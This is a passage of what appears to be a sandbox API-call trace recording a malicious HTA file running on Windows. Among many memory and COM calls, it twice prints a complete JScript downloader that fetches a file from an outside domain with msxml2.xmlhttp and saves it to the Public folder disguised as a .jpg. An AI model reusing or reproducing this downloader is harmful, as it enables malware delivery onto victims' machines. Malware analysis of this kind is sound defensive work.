(_Size=0x1004) returned 0xc4b6e0 [0134.518] malloc (_Size=0x104) returned 0xc4c6f0 [0134.519] free (_Block=0xc4b588) [0134.519] malloc (_Size=0x204) returned 0xc4c800 [0134.519] malloc (_Size=0x40) returned 0xc4b588 [0134.519] malloc (_Size=0x1d4) returned 0xc4ca10 [0134.519] malloc (_Size=0x8) returned 0xc1a350 [0134.519] free (_Block=0xc4b6e0) [0134.519] free (_Block=0xc4ad78) [0134.519] free (_Block=0xc4ad48) [0134.520] free (_Block=0xc4b588) [0134.520] free (_Block=0xc4c800) [0134.520] free (_Block=0xc4c6f0) [0134.520] malloc (_Size=0x28) returned 0xc4ad48 [0134.520] malloc (_Size=0x18) returned 0xc4ad78 [0134.520] malloc (_Size=0xc) returned 0xc1a780 [0134.520] malloc (_Size=0x20) returned 0xc48520 [0134.520] ISystemDebugEventFire:IsActive (This=0x68f968) returned 0x1 [0134.521] malloc (_Size=0x658) returned 0xc4ad98 [0134.521] GetCurrentThreadId () returned 0xb48 [0134.521] GetCurrentThreadId () returned 0xb48 [0134.522] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x56c8270b, dwHighDateTime=0x1d7d80b)) [0134.522] GetTickCount () returned 0x1d6c72f [0134.531] malloc (_Size=0x178) returned 0xc4b3f8 [0134.536] malloc (_Size=0xf8) returned 0xc4b578 [0134.536] malloc (_Size=0x174) returned 0xc4b678 [0134.537] malloc (_Size=0x78) returned 0xc4b7f8 [0134.537] malloc (_Size=0x30) returned 0xc5a5a0 [0134.537] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x203000, flProtect=0x4) returned 0x9530000 [0134.538] malloc (_Size=0x98) returned 0xc4b878 [0134.538] malloc (_Size=0x404) returned 0xc4b918 [0134.538] malloc (_Size=0xf8) returned 0xc4bd28 [0134.538] malloc (_Size=0x178) returned 0xc4be28 [0134.539] malloc (_Size=0xc8) returned 0xc4bfa8 [0134.539] malloc (_Size=0xf8) returned 0xc4c078 [0134.539] malloc (_Size=0x174) returned 0xc4c178 [0134.539] malloc (_Size=0xf8) returned 0xc4c2f8 [0134.587] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x56d21717, dwHighDateTime=0x1d7d80b)) [0134.596] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0134.596] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1e) returned 0x64cf40 [0134.596] GetCurrentThreadId () returned 0xb48 [0134.596] _wcsicmp (_String1="window", _String2="window") returned 0 [0134.686] GetCurrentThreadId () returned 0xb48 [0134.686] GetCurrentThreadId () returned 0xb48 [0134.686] GetCurrentThreadId () returned 0xb48 [0134.686] malloc (_Size=0x2c) returned 0xc5aa00 [0134.686] GetCurrentThreadId () returned 0xb48 [0134.687] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0134.687] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0134.687] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0134.687] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x56e16d56, dwHighDateTime=0x1d7d80b)) [0134.687] GetTickCount () returned 0x1d6c7cc [0134.699] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x56e31b4c, dwHighDateTime=0x1d7d80b)) [0134.699] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x56e31b4c, dwHighDateTime=0x1d7d80b)) [0134.699] GetTickCount () returned 0x1d6c7db [0134.699] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x56e32f5e, dwHighDateTime=0x1d7d80b)) [0134.699] GetCurrentThreadId () returned 0xb48 [0134.699] GetCurrentThreadId () returned 0xb48 [0134.699] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0134.700] GetProcAddress (hModule=0x743f0000, lpProcName=0xa) returned 0x744092d0 [0134.700] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19ed68 | out: lpflOldProtect=0x19ed68*=0x4) returned 1 [0134.701] malloc (_Size=0x328) returned 0xc4c3f8 [0134.703] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x56e3d7bc, dwHighDateTime=0x1d7d80b)) [0134.703] GetTickCount () returned 0x1d6c7db [0134.704] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x56e3ec42, dwHighDateTime=0x1d7d80b)) [0134.704] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1a) returned 0x64ce28 [0134.704] GetCurrentThreadId () returned 0xb48 [0134.704] _wcsicmp (_String1="window", _String2="window") returned 0 [0134.704] GetCurrentThreadId () returned 0xb48 [0134.704] GetCurrentThreadId () returned 0xb48 [0134.704] GetCurrentThreadId () returned 0xb48 [0134.704] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0134.704] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0134.704] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0134.705] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x56e41220, dwHighDateTime=0x1d7d80b)) [0134.705] GetTickCount () returned 0x1d6c7db [0134.705] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x56e41220, dwHighDateTime=0x1d7d80b)) [0134.705] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x56e41220, dwHighDateTime=0x1d7d80b)) [0134.705] GetTickCount () returned 0x1d6c7db [0134.705] SysStringLen (param_1="var girlLikeDoor = new ActiveXObject(\"msxml2.xmlhttp\");girlLikeDoor.open(\"GET\", \"http://shoulderelliottd.com/boolk/QlaJk8C6vYqIyEwbdypBHv3yJR/wrWWNCD/77427/bebys8?cid=Bm9cAP&wP8zhkK=aNLC3bJChZM5GauIB&=S0MRS72jqtkORxKA3iUkjdS\", false);girlLikeDoor.send();if(girlLikeDoor.status == 200){try{var karolYouGirl = new ActiveXObject(\"adodb.stream\");karolYouGirl.open;karolYouGirl.type = 1;karolYouGirl.write(girlLikeDoor.responsebody);karolYouGirl.savetofile(\"c:\\\\users\\\\public\\\\tubeGirlLoad.jpg\", 2);karolYouGirl.close;}catch(e){}}") returned 0x20d [0134.705] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x56e4272f, dwHighDateTime=0x1d7d80b)) [0134.705] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x56e4272f, dwHighDateTime=0x1d7d80b)) [0134.705] GetTickCount () returned 0x1d6c7db [0134.706] GetCurrentThreadId () returned 0xb48 [0134.706] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0134.706] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0134.706] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0134.706] IsCharSpaceW (wch=0x67) returned 0 [0134.706] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0134.706] malloc (_Size=0x28) returned 0xc4c728 [0134.706] GetCurrentThreadId () returned 0xb48 [0134.707] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0134.707] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0134.707] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0134.707] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0134.707] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0134.707] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0134.708] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x67cfd0 [0134.708] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x800) returned 0x6920f0 [0134.708] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x100) returned 0x6928f8 [0134.708] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x604d38 [0134.708] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x604d48 [0134.708] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0134.708] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x67d190 [0134.708] memcpy_s (in: _Destination=0x67d198, _DestinationSize=0xa, _Source=0x6928f8, _SourceSize=0xa | out: _Destination=0x67d198) returned 0x0 [0134.708] memcpy_s (in: _Destination=0x609b04, _DestinationSize=0xa, _Source=0x67d198, _SourceSize=0xa | out: _Destination=0x609b04) returned 0x0 [0134.708] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x604d48 | out: hHeap=0x5e0000) returned 1 [0134.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x604d38 | out: hHeap=0x5e0000) returned 1 [0134.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x67d190 | out: hHeap=0x5e0000) returned 1 [0134.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x67cfd0 | out: hHeap=0x5e0000) returned 1 [0134.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6920f0 | out: hHeap=0x5e0000) returned 1 [0134.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6928f8 | out: hHeap=0x5e0000) returned 1 [0134.709] SysStringLen (param_1="lave") returned 0x4 [0134.710] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xe) returned 0x690490 [0134.710] GetCurrentThreadId () returned 0xb48 [0134.710] _wcsicmp (_String1="window", _String2="window") returned 0 [0134.710] GetCurrentThreadId () returned 0xb48 [0134.710] GetCurrentThreadId () returned 0xb48 [0134.717] malloc (_Size=0x204) returned 0xc4c758 [0134.718] GetCurrentThreadId () returned 0xb48 [0134.719] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0134.719] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0134.719] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0134.719] SysStringLen (param_1="var girlLikeDoor = new ActiveXObject(\"msxml2.xmlhttp\");girlLikeDoor.open(\"GET\", \"http://shoulderelliottd.com/boolk/QlaJk8C6vYqIyEwbdypBHv3yJR/wrWWNCD/77427/bebys8?cid=Bm9cAP&wP8zhkK=aNLC3bJChZM5GauIB&=S0MRS72jqtkORxKA3iUkjdS\", false);girlLikeDoor.send();if(girlLikeDoor.status == 200){try{var karolYouGirl = new ActiveXObject(\"adodb.stream\");karolYouGirl.open;karolYouGirl.type = 1;karolYouGirl.write(girlLikeDoor.responsebody);karolYouGirl.savetofile(\"c:\\\\users\\\\public\\\\tubeGirlLoad.jpg\", 2);karolYouGirl.close;}catch(e){}}") returned 0x20d [0134.719] malloc (_Size=0x22c) returned 0xc4cbf0 [0134.720] malloc (_Size=0x804) returned 0xc4ce28 [0134.720] malloc (_Size=0x19c) returned 0xc4d638 [0134.720] malloc (_Size=0x200) returned 0xc4d7e0 [0134.720] wcscpy_s (in: _Destination=0xc4d5ac, _SizeInWords=0xd, _Source="girlLikeDoor" | out: _Destination="girlLikeDoor") returned 0x0 [0134.720] wcscpy_s (in: _Destination=0xc4d5c6, _SizeInWords=0x7, _Source="status" | out: _Destination="status") returned 0x0 [0134.720] malloc (_Size=0x1004) returned 0xc4d9e8 [0134.720] wcscpy_s (in: _Destination=0xc4da1c, _SizeInWords=0xd, _Source="karolYouGirl" | out: _Destination="karolYouGirl") returned 0x0 [0134.720] wcscpy_s (in: _Destination=0xc4da36, _SizeInWords=0x5, _Source="open" | out: _Destination="open") returned 0x0 [0134.720] wcscpy_s (in: _Destination=0xc4da60, _SizeInWords=0xd, _Source="karolYouGirl" | out: _Destination="karolYouGirl") returned 0x0 [0134.720] wcscpy_s (in: _Destination=0xc4da7a, _SizeInWords=0x5, _Source="type" | out: _Destination="type") returned 0x0 [0134.720] wcscpy_s (in: _Destination=0xc4dad4, _SizeInWords=0xd, _Source="girlLikeDoor" | out: _Destination="girlLikeDoor") returned 0x0 [0134.720] wcscpy_s (in: _Destination=0xc4daee, _SizeInWords=0xd, _Source="responsebody" | out: _Destination="responsebody") returned 0x0 [0134.720] wcscpy_s (in: _Destination=0xc4dbac, _SizeInWords=0xd, _Source="karolYouGirl" | out: _Destination="karolYouGirl") returned 0x0 [0134.720] wcscpy_s (in: _Destination=0xc4dbc6, _SizeInWords=0x6, _Source="close" | out: _Destination="close") returned 0x0 [0134.720] free (_Block=0xc4d7e0) [0134.720] free (_Block=0xc4d638) [0134.721] malloc (_Size=0x30) returned 0xc5a8b0 [0134.721] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x3000, flProtect=0x4) returned 0x9550000 [0134.722] malloc (_Size=0x84) returned 0xc4c968 [0134.722] malloc (_Size=0xc) returned 0xc1a7b0 [0134.722] malloc (_Size=0xc) returned 0xc1a588 [0134.722] malloc (_Size=0x10) returned 0xc1a570 [0134.722] malloc (_Size=0x28) returned 0xc4d638 [0134.722] free (_Block=0xc1a570) [0134.722] malloc (_Size=0x58) returned 0xc4d668 [0134.722] free (_Block=0xc4d638) [0134.722] malloc (_Size=0x80) returned 0xbfcd90 [0134.722] malloc (_Size=0x30) returned 0xc5a7d0 [0134.722] free (_Block=0xc4d9e8) [0134.722] free (_Block=0xc4ce28) [0134.722] free (_Block=0xc4cbf0) [0134.722] wcscpy_s (in: _Destination=0x735c2e0, _SizeInWords=0xa, _Source="eval code" | out: _Destination="eval code") returned 0x0 [0134.723] malloc (_Size=0x84) returned 0xc4cbf0 [0134.723] malloc (_Size=0x90) returned 0xc4cc80 [0135.705] ResolveDelayLoadedAPI () returned 0x76b42370 [0135.706] CLSIDFromProgIDEx (in: lpszProgID="msxml2.xmlhttp", lpclsid=0x199dc4 | out: lpclsid=0x199dc4*(Data1=0xf6d90f16, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4))) returned 0x0 [0135.712] ResolveDelayLoadedAPI () returned 0x76e6c1b0 [0135.716] CoGetClassObject (in: rclsid=0x199dc4*(Data1=0xf6d90f16, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), dwClsContext=0x5, pvReserved=0x0, riid=0x6c9dd5c4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x199dbc | out: ppv=0x199dbc*=0x65a667a8) returned 0x0 [0135.933] XMLHTTP:IUnknown:QueryInterface (in: This=0x65a667a8, riid=0x6c9d1b68*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x199db4 | out: ppvObject=0x199db4*=0x0) returned 0x80004002 [0135.933] XMLHTTP:IClassFactory:CreateInstance (in: This=0x65a667a8, pUnkOuter=0x0, riid=0x6c9ca8ac*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x199e14 | out: ppvObject=0x199e14*=0x9633980) returned 0x0 [0135.951] XMLHTTP:IUnknown:Release (This=0x65a667a8) returned 0x1 [0135.951] XMLHTTP:IUnknown:QueryInterface (in: This=0x9633980, riid=0x6c9d1b38*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x199dbc | out: ppvObject=0x199dbc*=0x96339a4) returned 0x0 [0135.952] malloc (_Size=0xc) returned 0xc1a6d8 [0135.952] XMLHTTP:IObjectWithSite:SetSite (This=0x96339a4, pUnkSite=0xc1a6d8) returned 0x0 [0135.952] XMLHTTP:IUnknown:AddRef (This=0xc1a6d8) returned 0x2 [0135.952] XMLHTTP:IUnknown:QueryInterface (in: This=0xc1a6d8, riid=0x76db7490*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x199c30 | out: ppvObject=0x199c30*=0x0) returned 0x80004002 [0135.952] XMLHTTP:IUnknown:AddRef (This=0xc1a6d8) returned 0x3 [0135.952] XMLHTTP:IUnknown:QueryInterface (in: This=0xc1a6d8, riid=0x76db74b0*(Data1=0x39, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x199bc4 | out: ppvObject=0x199bc4*=0x0) returned 0x80004002 [0135.952] XMLHTTP:IUnknown:QueryInterface (in: This=0xc1a6d8, riid=0x76db7460*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x199bcc | out: ppvObject=0x199bcc*=0x0) returned 0x80004002 [0135.952] XMLHTTP:IUnknown:QueryInterface (in: This=0xc1a6d8, riid=0x76db7700*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x199bd0 | out: ppvObject=0x199bd0*=0x0) returned 0x80004002 [0135.952] XMLHTTP:IUnknown:QueryInterface (in: This=0xc1a6d8, riid=0x76db76ac*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x199bc8 | out: ppvObject=0x199bc8*=0x0) returned 0x80004002 [0135.952] XMLHTTP:IUnknown:Release (This=0xc1a6d8) returned 0x2 [0135.952] XMLHTTP:IUnknown:AddRef (This=0xc1a6d8) returned 0x3 [0135.952] XMLHTTP:IUnknown:Release (This=0xc1a6d8) returned 0x2 [0135.952] XMLHTTP:IUnknown:QueryInterface (in: This=0xc1a6d8, riid=0x65a66d14*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x199cd4 | out: ppvObject=0x199cd4*=0xc1a6d8) returned 0x0 [0135.954] XMLHTTP:IUnknown:QueryInterface (in: This=0xc1a6d8, riid=0x65a69964*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x198c30 | out: ppvObject=0x198c30*=0xc1a6d8) returned 0x0 [0135.955] XMLHTTP:IServiceProvider:QueryService (in: This=0xc1a6d8, guidService=0x65a6b1f4*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x65a66d80*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x198c08 | out: ppvObject=0x198c08*=0x0) returned 0x80004002 [0135.955] GetCurrentThreadId () returned 0xb48 [0135.955] GetCurrentThreadId () returned 0xb48 [0135.955] GetCurrentThreadId () returned 0xb48 [0135.955] XMLHTTP:IServiceProvider:QueryService (in: This=0xc1a6d8, guidService=0x65a6b1c4*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x65a6b1c4*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x198c10 | out: ppvObject=0x198c10*=0x0) returned 0x80004002 [0135.955] GetCurrentThreadId () returned 0xb48 [0135.955] GetCurrentThreadId () returned 0xb48 [0135.955] GetCurrentThreadId () returned 0xb48 [0135.955] XMLHTTP:IServiceProvider:QueryService (in: This=0xc1a6d8, guidService=0x65a6b1d4*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x65a6b1e4*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x198c28 | out: ppvObject=0x198c28*=0xcf83c0) returned 0x0 [0135.955] GetCurrentThreadId () returned 0xb48 [0135.955] GetCurrentThreadId () returned 0xb48 [0135.955] GetCurrentThreadId () returned 0xb48 [0135.956] IHTMLDocument2:get_all (in: This=0xcf83c0, p=0x198c38 | out: p=0x198c38*=0xcf8928) returned 0x0 [0135.956] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0135.957] IHTMLElementCollection:get_length (in: This=0xcf8928, p=0x198c24 | out: p=0x198c24*=10) returned 0x0 [0135.957] IHTMLElementCollection:item (in: This=0xcf8928, name=0x198b98*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), index=0x198ba8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pdisp=0x198c0c | out: pdisp=0x198c0c*=0xd1a9c0) returned 0x0 [0135.957] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0135.960] GetProcAddress (hModule=0x743f0000, lpProcName=0x93) returned 0x74407260 [0136.027] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x1989fc | out: lpflOldProtect=0x1989fc*=0x4) returned 1 [0136.028] IUnknown:QueryInterface (in: This=0xd1a9c0, riid=0x65a6b19c*(Data1=0x3050f1ff, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), ppvObject=0x198c20 | out: ppvObject=0x198c20*=0xcf8930) returned 0x0 [0136.028] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0136.029] IHTMLDocument2:get_forms (in: This=0xcf8930, p=0x198c2c | out: p=0x198c2c*=0x64cf6c) returned 0x0 [0136.029] IUnknown:Release (This=0xcf8930) returned 0x0 [0136.029] IUnknown:Release (This=0xd1a9c0) returned 0x2 [0136.029] IHTMLElementCollection:item (in: This=0xcf8928, name=0x198b98*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), index=0x198ba8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pdisp=0x198c0c | out: pdisp=0x198c0c*=0xd1aa00) returned 0x0 [0136.030] IUnknown:QueryInterface (in: This=0xd1aa00, riid=0x65a6b19c*(Data1=0x3050f1ff, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), ppvObject=0x198c20 | out: ppvObject=0x198c20*=0xcf8930) returned 0x0 [0136.030] IHTMLDocument2:get_forms (in: This=0xcf8930, p=0x198c2c | out: p=0x198c2c*=0x64cf6c) returned 0x0 [0136.031] IUnknown:Release (This=0xcf8930) returned 0x0 [0136.031] IUnknown:Release (This=0xd1aa00) returned 0x1 [0136.031] IHTMLElementCollection:item (in: This=0xcf8928, name=0x198b98*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), index=0x198ba8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pdisp=0x198c0c | out: pdisp=0x198c0c*=0xd1aa40) returned 0x0 [0136.031] IUnknown:QueryInterface (in: This=0xd1aa40, riid=0x65a6b19c*(Data1=0x3050f1ff, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), ppvObject=0x198c20 | out: ppvObject=0x198c20*=0xcf8930) returned 0x0 [0136.031] IHTMLDocument2:get_forms (in: This=0xcf8930, p=0x198c2c | out: p=0x198c2c*=0x64cf6c) returned 0x0 [0136.032] IUnknown:Release (This=0xcf8930) returned 0x0 [0136.032] IUnknown:Release (This=0xd1aa40) returned 0x1 [0136.032] IHTMLElementCollection:item (in: This=0xcf8928, name=0x198b98*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), index=0x198ba8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pdisp=0x198c0c | out: pdisp=0x198c0c*=0xd0a690) returned 0x0 [0136.033] IUnknown:QueryInterface (in: This=0xd0a690, riid=0x65a6b19c*(Data1=0x3050f1ff, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), ppvObject=0x198c20 | out: ppvObject=0x198c20*=0xcf8930) returned 0x0 [0136.033] IHTMLDocument2:get_forms (in: This=0xcf8930, p=0x198c2c | out: p=0x198c2c*=0x64cf6c) returned 0x0 [0136.034] IUnknown:Release (This=0xcf8930) returned 0x0 [0136.034] IUnknown:Release (This=0xd0a690) returned 0x2 [0136.034] IUnknown:Release (This=0xcf8928) returned 0x0 [0136.034] IHTMLDocument2:get_url (in: This=0xcf83c0, p=0x198c18 | out: p=0x198c18*="file://C:\\Users\\Public\\powPowNext.hta") returned 0x0 [0136.034] IUnknown:AddRef (This=0x609dbc) returned 0x8 [0136.034] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x604d38 [0136.034] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x604d38 | out: hHeap=0x5e0000) returned 1 [0136.034] IUnknown:AddRef (This=0x609dbc) returned 0x9 [0136.034] IUnknown:Release (This=0x609dbc) returned 0x8 [0136.034] IUri:GetScheme (in: This=0x609dbc, pdwScheme=0x198b64 | out: pdwScheme=0x198b64*=0x9) returned 0x0 [0136.034] IUnknown:QueryInterface (in: This=0x609dbc, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x198b38 | out: ppvObject=0x198b38*=0x609dbc) returned 0x0 [0136.035] IUnknown:Release (This=0x609dbc) returned 0x8 [0136.035] IUnknown:QueryInterface (in: This=0x609dbc, 